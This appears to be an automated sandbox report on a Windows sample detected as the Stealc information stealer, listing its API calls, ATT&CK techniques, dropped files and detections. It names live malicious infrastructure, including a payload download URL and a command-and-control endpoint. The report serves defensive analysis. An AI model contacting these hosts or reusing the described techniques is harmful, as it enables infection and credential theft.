                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00A1B291
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,0_2_00A15447
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_00A1B5EF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_00A1B509
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_00A1B554
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,0_2_00A1B8CC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00A1B9F5
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,0_2_00A1BAFC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00A1BBC9
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00417B90
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_02D27DF7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004103ED GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103ED
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_00417850
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_00417A30
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0041640A GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_0041640A
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 1.3.A8A9.tmp.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.2d10e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.A8A9.tmp.exe.2d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.2d10e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: A8A9.tmp.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Yara detected Stealc
                    Source: Yara matchFile source: 1.3.A8A9.tmp.exe.2d60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.2d10e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.A8A9.tmp.exe.2d60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.A8A9.tmp.exe.2d10e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1833028905.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: A8A9.tmp.exe PID: 7404, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004218EC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218EC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00420C16 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C16
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A01B53 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00A01B53
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A00E7D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00A00E7D

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts13
                    Native API                    		1
                    DLL Side-Loading                    		111
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		21
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Query Registry                    		Remote Desktop Protocol3
                    Clipboard Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools                    		Security Account Manager131
                    Security Software Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS11
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets11
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing                    		DCSync1
                    Account Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc Filesystem1
                    System Owner/User Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                    File and Directory Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing134
                    System Information Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    jicQJ2cdlM.exe32%ReversingLabs
                    jicQJ2cdlM.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
                    C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe100%AviraHEUR/AGEN.1312567
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe34%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe34%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    post-to-me.com
                    		104.21.56.70
                    		truefalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://62.204.41.177/edd20096ecef326d.phptrue
                        		unknown
                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                          		unknown
                          http://62.204.41.177/true
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://62.204.41.177/edd20096ecef326d.phpLA8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://post-to-me.com/track_prt.php?sub=&cc=DEjicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                		unknown
                                https://post-to-me.com/track_prt.php?sub=jicQJ2cdlM.exefalse
                                  		unknown
                                  http://176.113.115.37/ScreenUpdateSync.exePjicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://62.204.41.177/KA8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://62.204.41.177/edd20096ecef326d.phpJA8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://176.113.115.37/ScreenUpdateSync.exek4jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://62.204.41.177/$cA8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://62.204.41.177/edd20096ecef326d.php6A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://post-to-me.com/track_prt.php?sub=0&cc=DETjicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWAREjicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                  		unknown
                                                  https://post-to-me.com/jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://upx.sf.netAmcache.hve.4.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://post-to-me.com/vjicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://176.113.115.37/ScreenUpdateSync.exeajicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://62.204.41.177/edd20096ecef326d.phpIcA8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://176.113.115.37/ScreenUpdateSync.exejicQJ2cdlM.exe, jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.4048093961.000000000086F000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.000000000086F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://62.204.41.177/edd20096ecef326d.phpGc:A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://62.204.41.177A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                		unknown
                                                                http://62.204.41.177/edd20096ecef326d.phpbA8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://62.204.41.177SA8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    176.113.115.37
                                                                    		unknownRussian Federation
                                                                    		49505SELECTELRUfalse
                                                                    62.204.41.177
                                                                    		unknownUnited Kingdom
                                                                    		30798TNNET-ASTNNetOyMainnetworkFItrue
                                                                    104.21.56.70
                                                                    		post-to-me.comUnited States
                                                                    		13335CLOUDFLARENETUSfalse

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1542867
                                                                    Start date and time:2024-10-26 18:57:14 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 12s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:9
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:jicQJ2cdlM.exe
                                                                    renamed because original name is a hash value
                                                                    Original Sample Name:c26c0c92ef5ad707c6f9dd37b2c016ae.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.evad.winEXE@4/7@1/3
                                                                    EGA Information:
                                                                    • Successful, ratio: 100%
                                                                    HCA Information:
                                                                    • Successful, ratio: 98%
                                                                    • Number of executed functions: 52
                                                                    • Number of non-executed functions: 362
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: jicQJ2cdlM.exe

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    12:58:18API Interceptor9265076x Sleep call for process: jicQJ2cdlM.exe modified
                                                                    12:58:46API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    176.113.115.37w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 176.113.115.37/ScreenUpdateSync.exe
                                                                    hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 176.113.115.37/seed.exe
                                                                    62.204.41.177c4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                                    • 62.204.41.177/edd20096ecef326d.php
                                                                    104.21.56.70jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                      mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                        BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                          v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                            Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                              VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                                hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  post-to-me.comw12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 172.67.179.207
                                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                                                  • 172.67.179.207
                                                                                  VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 172.67.179.207
                                                                                  hlyG1m5UmO.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 104.21.56.70

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUShttp://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IGGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.189.243
                                                                                  http://cio.krqe.com/gtdhffgjghfj3081868fB16927453Xe78849729yB17367Xb25vBr206268IGGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.189.243
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.95.91
                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                  • 172.67.170.64
                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                  • 104.21.95.91
                                                                                  w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 172.67.179.207
                                                                                  6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  6VTskjqyxX.exeGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  SELECTELRUw12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                                                  • 176.113.115.37
                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 92.53.102.17
                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 95.213.162.65
                                                                                  TNNET-ASTNNetOyMainnetworkFIc4da1217278a52b300055859db330a4a3dca4ad09fe56.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  Ondso1o6Yz.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  ZDW7Di1Ykf.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 62.204.41.177
                                                                                  cdc57Mn7dE.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177
                                                                                  5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                                                  • 62.204.41.177

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  37f463bf4616ecd445d4a1937da06e19ae67deafb5d9386fbca3d4d728d79651daaa42eef8086.exeGet hashmaliciousStealc, VidarBrowse
                                                                                  • 104.21.56.70
                                                                                  w12rykWq2L.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  jWpgP22dl2.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  1GeaC4QnFy.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 104.21.56.70
                                                                                  OyPpyRRqd8.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                  • 104.21.56.70
                                                                                  mCe4hBfqCT.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70
                                                                                  H33UCslPzv.exeGet hashmaliciousXWormBrowse
                                                                                  • 104.21.56.70
                                                                                  factura Fvsae2400398241025.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 104.21.56.70
                                                                                  SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.56.70
                                                                                  BKoQ3DF8eD.exeGet hashmaliciousStealcBrowse
                                                                                  • 104.21.56.70

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

